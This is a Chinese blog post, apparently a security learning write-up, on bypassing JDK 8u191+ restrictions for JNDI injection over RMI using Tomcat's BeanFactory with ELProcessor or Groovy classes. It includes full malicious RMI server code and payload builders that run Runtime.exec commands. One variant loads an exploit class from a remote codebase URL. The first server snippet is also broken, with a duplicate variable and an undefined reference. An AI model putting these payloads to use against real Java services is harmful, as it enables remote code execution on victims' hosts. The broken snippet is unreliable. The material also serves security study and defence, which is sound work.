《JDK 8u191之后的JNDI注入(RMI)》

最新推荐文章于 2024-05-22 12:27:53 发布
最新推荐文章于 2024-05-22 12:27:53 发布
阅读量1.2w 收藏 10
点赞数 1
分类专栏: Web 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/105976072
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

参考:

jdk 8u191之前利用过程

在这里插入图片描述

jdk 8u191之后利用过程

由于无法加载远程的类了,于是寻找能否使用本地的类:

在这里插入图片描述

绕过限制:利用本地Class作为Reference Factory

利用org.apache.naming.factory.BeanFactory
(当然前提是得有tomcat的这个jar包)

与之前的LDAP利用的绕过类似,也是有这么一个方法:
jdk1.8.0_201\jre\lib\rt.jar!\com\sun\jndi\rmi\registry\RegistryContext#decodeObject(Remote var1, Name var2)

由于在这个类com.sun.jndi.rmi.registry.RegistryContext的静态代码块中设置了trustURLCodebase为false。除非手动将该JVM参数设置为true。
在这里插入图片描述
下图可见,传统利用方式,在高版本JDK中被限制,抛出异常。
在这里插入图片描述

针对 RMI 利用的检查方式中最关键的就是 if (var8 != null && var8.getFactoryClassLocation() != null && !trustURLCodebase) 如果 FactoryClassLocation 为空,那么就会进入 NamingManager.getObjectInstance 在此方法会调用 Reference 中的ObjectFactory。因此绕过思路为在目标 classpath 中寻找实现 ObjectFactory 接口的类。在 Tomcat 中有一处可以利用的符合条件的类org.apache.naming.factory.BeanFactory 在此类中会获取 Reference 中的forceString 得到其中的值之后会判断是否包含等号,如果包含则用等号分割,将前一半当做方法名,后一半当做 Hashmap 中的 key。如果不包含等号则方法名变成 set开头。值得注意的是此方法中已经指定了参数类型为 String。后面将会利用反射执行前面所提到的方法。因此需要找到使用了 String 作为参数,并且能 RCE的方法。在javax.el.ELProcessor 中的 eval 方法就很合适

参考:
https://bl4ck.in/tricks/2019/01/04/JNDI-Injection-Bypass.html

普通的8u121之前的RMI恶意注入的服务器代码为:

//Ref: https://www.veracode.com/blog/research/exploiting-jndi-injections-java
  
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

public class NormalRMIServer {

    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1097);
        // 绕过方式的payload
//        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
//        resourceRef.add(new StringRefAddr("forceString", "a=eval"));
//        resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));


        // 普通方式的payload
        Reference ref = new Reference("whatever", "ExploitWin","http://192.168.85.1:8888/");
        
        // 普通方式的payload之二
        ResourceRef ref = new ResourceRef("whatever", null, "", "", true, "ExploitWin","http://192.168.85.1:8888/");
        
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
        registry.bind("EvalObj", referenceWrapper);
        System.out.println("the Server is bind rmi://127.0.0.1:1097/EvalObj");
    }
}

PoC构造:
将ResourceRef构造器的第七个参数设置为null:
tomcat-embed-core-8.5.11.jar!\org\apache\naming\ResourceRef.class
在这里插入图片描述

完整代码

// TomcatRMIServer.java
/**
* javac -cp  "D:\repos\apache-tomcat-8.5.53\lib\catalina.jar" .\TomcatRMIServer.java
* java -cp ".;D:\repos\apache-tomcat-8.5.53\lib\catalina.jar" TomcatRMIServer
*/
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

public class TomcatRMIServer {

    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1098);
        // 最后两个参数是:`factory`和`factoryLocation`
        // 本意factoryLocation是远程加载factory的地址,比如是一个url
        // 这里故意将其设置为null。
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
        resourceRef.add(new StringRefAddr("forceString", "a=eval"));
        resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
        registry.bind("EvalObj", referenceWrapper);
        System.out.println("the Server is bind rmi://127.0.0.1:1098/EvalObj");
    }
}

则对应的factoryLocation属性为null,这样在逻辑判断时,不满足第一个if的条件,于是进入else逻辑中。
在这里插入图片描述
jdk1.8.0_201\jre\lib\rt.jar!\com\sun\jndi\rmi\registry\RegistryContext#decodeObject(Remote var1, Name var2)
继续跟进:
javax.naming.spi.NamingManager#getObjectInstance
在这里插入图片描述
继续跟进org.apache.naming.factory.BeanFactory#getObjectInstance
在这里插入图片描述
取出RMI服务发过来的对象的值,最后执行:
在这里插入图片描述
以下为演示:
在这里插入图片描述
原理是调用了

new javax.el.ELProcessor().eval("Runtime.getRuntime().exec(\"calc\")");

调用栈:

eval:54, ELProcessor (javax.el)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
getObjectInstance:211, BeanFactory (org.apache.naming.factory)
getObjectInstance:321, NamingManager (javax.naming.spi)
decodeObject:499, RegistryContext (com.sun.jndi.rmi.registry)
lookup:138, RegistryContext (com.sun.jndi.rmi.registry)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
setAutoCommit:4067, JdbcRowSetImpl (com.sun.rowset)

总结

条件依赖:

  • org.apache.naming.factory.BeanFactory
    由于依赖org.apache.naming.factory.BeanFactory这个类,这个类在Tomcat中,所以必须要有Tomcat相关的包:
    在这里插入图片描述
  • javax.el.ELProcessor
依赖javax.el.ELProcessor这个类

这个类只在Tomcat8中存在:
在这里插入图片描述

所以条件是Tomcat 8+。

javax.el.ELProcessor本身是Tomcat8中存在的库,所以仅限Tomcat8及更高版本环境下可以通过javax.el.ELProcessor进行攻击,对于使用广泛的SpringBoot应用来说,可被利用的Spring Boot Web Starter版本应在1.2.x及以上,因为1.1.x及1.0.x内置的是Tomcat7。

在这里插入图片描述

对应代码:

    public ResourceRef execByEL() {
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "x=eval"));
        ref.add(new StringRefAddr("x", String.format(
                "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(" +
                        "\"java.lang.Runtime.getRuntime().exec('%s')\"" +
                        ")",
                this.command    // "calc"
        )));
        return ref;
    }
依赖groovy 2以上相关类
        <dependency>
            <groupId>org.codehaus.groovy</groupId>
            <artifactId>groovy</artifactId>
            <version>2.4.5</version>
        </dependency>

在这里插入图片描述
对应代码:

    public ReferenceWrapper execByGroovyParse() throws RemoteException, NamingException{
        ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "x=parseClass"));
        String script = String.format("@groovy.transform.ASTTest(value={\n" +
                "    assert java.lang.Runtime.getRuntime().exec(\"%s\")\n" +
                "})\n" +
                "def x\n",
//                commandGenerator.getBase64CommandTpl()
                "calc"
        );
        ref.add(new StringRefAddr("x",script));
        return new ReferenceWrapper(ref);
    }

系统报错:

java.lang.ClassCastException: groovy.lang.GroovyClassLoader cannot be cast to javax.sql.DataSource
依赖groovy任意版本的类

比如1.5的groovy:

		<!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy-all -->
		<dependency>
			<groupId>org.codehaus.groovy</groupId>
			<artifactId>groovy-all</artifactId>
			<version>1.5.0</version>
		</dependency>

或者2.x的groovy都可以。
在这里插入图片描述

系统报错:

java.lang.ClassCastException: groovy.lang.GroovyShell cannot be cast to javax.sql.DataSource

对应代码:

    public ReferenceWrapper execByGroovy() throws RemoteException, NamingException{
        ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "x=evaluate"));
        String script = String.format("'%s'.execute()", "calc"); //commandGenerator.getBase64CommandTpl());
        ref.add(new StringRefAddr("x",script));
        return new ReferenceWrapper(ref);
    }

参考:

  • https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java#L22
  • 浅析JNDI注入Bypass
caiqiiqi
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全学习笔记--一次对JNDI注入失败的问题排查(手写POC以及rmi)
m0_64685672的博客
02-05 3449
前言 Exception in thread "main" java.lang.UnsupportedClassVersionError: Exp : Unsupported major.minor version 52.0
JNDI RMI 注入(Log4j2漏洞)
sun0322
12-24 8450
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
JDK高版本下JNDI注入绕过
最新发布
wfz2333的博客
05-22 1169
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
ref 能否注入为null_如何绕过高版本JDK限制进行JNDI注入利用
weixin_39783633的博客
12-15 804
//写在前面//Java JNDI注入有很多种不同的利用方式,而这些利用方式的Payload分别有一些限制。在之前《深入理解JNDI注入与Java反序列化漏洞利用》中,我们主要讨论的是通过RMI服务返回 JNDI Naming Reference Payload 的攻击手法,除此之外还有 RMI Remote Object Payload、LDAP Naming Reference Pa...
java rmi 详解
u013803262的专栏
04-03 458
在Java中有一种叫rmi的技术全称叫 remote method invoke (远程方法调用)首先来说一下rmi和rpc的对比吧。 两个技术都有的共同点都是自己的机器上去掉别的机器上的服务。 不同的地方是rmi是Java语言实现的,rmi要求两端的实现都必须是Java代码。 而rpc则不同,所以rpc可以跨平台,而rmi则稍微差点。rmi客户端可以根据服务端暴露的接口,就可以去实现调用rm
JNDI注入+RMI流程复现代码调试
qq_63217130的博客
02-23 457
然后,它创建了一个Reference对象,该对象包含了一个URL地址。这里,url被用作Reference对象的一个参数,表示该对象引用的远程服务的地址。首先,它定义了一个url变量,该变量包含了要访问的远程对象的地址,格式为"rmi://localhost:1099/obj"。lookup方法会根据传入的url地址,在远程JNDI环境中查找对应的远程对象,并返回对该对象的引用。也就是服务的开启1099端口等开客户端远程调用,然后调用时,服务的回去8080端口找到客户端要调用的类,再返回给客户端。
JNDI注入学习1
08-03
**JNDI注入详解** Java Naming and Directory Interface (JNDI) 是Java应用程序用来查找和管理网络资源的接口。它不依赖于特定的目录服务,而是通过服务提供者接口(SPI)来支持多种不同的目录服务,如LDAP、DNS等...
JMX以RMI方式连接的场景示例
11-08
在我们的示例中,我们使用JDK 1.5或更高版本,使用RMI连接方式来连接MBeanServer和Client。我们在机器23上实现了Router类,并在机器26上实现了Client,用于远程访问Router类提供的管理功能。 Router类是一个简单的...
jndi-tool JNDI服务利用工具
01-06
JNDI注入攻击通常发生在应用程序不当处理JNDI查找时,攻击者可以通过构造恶意的JNDI引用来执行任意代码。例如,Fastjson是一个流行的Java库,用于快速转换Java对象到JSON格式和反之。在某些版本的Fastjson中,存在...
jdk 1.7免安装版
11-11
此外,JDK 1.7还包括对JDBC、JAXP、JNDIRMI等Java API的改进和增强,以及性能优化和错误修复。对于开发者来说,理解这些新特性和改进能够更好地利用JDK 1.7来提高开发效率和代码质量。在使用免安装版时,务必注意...
RMI(远程方法调用)简单代码例子
04-14
RMI(远程方法调用)简单代码例子 RMI(远程方法调用)简单代码例子
JNDI 详细解读
01-08
JNDI 的架构与 JDBC 非常相似,提供了一组标准的命名系统 API,最初作为 JDK 1.3 之前的扩展包 `jndi.jar` 提供。JNDI 架构基于 SPI (Service Provider Interface) 构建,主要包含以下五个核心包: 1. **`javax....
JDK 8u191之后JNDI注入(LDAP)》学习
公众号shadow sock7
09-27 4958
参考: 8u191之后JNDI注入(LDAP) JNDI注入,即某代码中存在JDNI的string可控的情况,可构造恶意RMI或者LDAP服务端,导致远程任意类被加载,造成任意代码执行。 JNDI注入RMI和LDAP与JDK版本的关系,参考这张图: 来源: https://xz.aliyun.com/t/6633 RMI + JNDI Reference利用方式: JDK 6u132, JD...
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9462
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
[Java安全]绕过高版本JDKJNDI注入学习
feng的博客
03-01 908
[Java安全]绕过高版本JDKJNDI注入学习 前言 接近2个月没有更新博客了,并不是自己在学什么东西,而是玩了整个寒假。。。因为去年的一些事情,导致现在的自己很颓废,但是毕竟是开学了,还是要慢慢学习了。 基本方法 找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。 利用LDAP直接返回一个恶意的序列化对象,JNDI注入依然会对该对象进行反序列化操作,利用反序列化Gadget完成命令执行。 这两种方式都非常依赖受害
Tomcat配置JNDI资源(连接池)o
weixin_42472048的博客
10-03 736
Tomcat配置连接池 1、Tomcat配置JNDI资源 JNDI(Java Naming and Directory Interface),Java命名和目录接口。JNDI的作用就是:在服务器上配置资源,然后通过统一的方式来获取配置的资源。 我们这里要配置的资源当然是连接池了,这样项目中就可以通过统一的方式来获取连接池对象了。 下图是Tomcat文档提供的: 配置JNDI资源需要到...
JNDI注入高版本绕过
yangyangrenren的专栏
12-22 2221
转载于JNDI注入高版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,然而如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这
java.lang.IllegalArgumentException介绍
热门推荐
小柒的专栏
08-28 13万+
相信这个异常大家都很常见。 我现在遇到一个需要配置tomcat  server.xml来修正的找不到的问题: 如下: java.lang.IllegalArgumentException: Document base C:\Source\AirChina\AirChina_Portal\WebContent does not exist or is not a readable dire
jdk 8u191 jdk1.8
10-08
JDK 8u191JDK 1.8是同一个版本的Java Development Kit(JDK)。JDK是Java开发环境的一部分,提供了许多工具和库,用于开发、编译、调试和运行Java程序。 JDK 8u191JDK 1.8的更新版本,其中的“u191”表示该版本的第191次更新。这个更新版主要是为了修复之前版本中的一些错误和漏洞,并提供了额外的安全性和稳定性。 JDK 1.8是Java SE 8(Standard Edition)的一个长期支持版本。它引入了许多新的特性和改进,例如函数式编程、Lambda表达式、Stream API、新的日期和时间API等。JDK 1.8还提供了更好的性能和可伸缩性,以及更好的集成性和互操作性。 因此,JDK 8u191JDK 1.8都是同一个版本的Java Development Kit,但JDK 8u191是其更新版本,带来了更好的安全性、稳定性和功能。如果您在使用Java开发环境,建议升级到最新版本,以获得更好的开发和运行体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值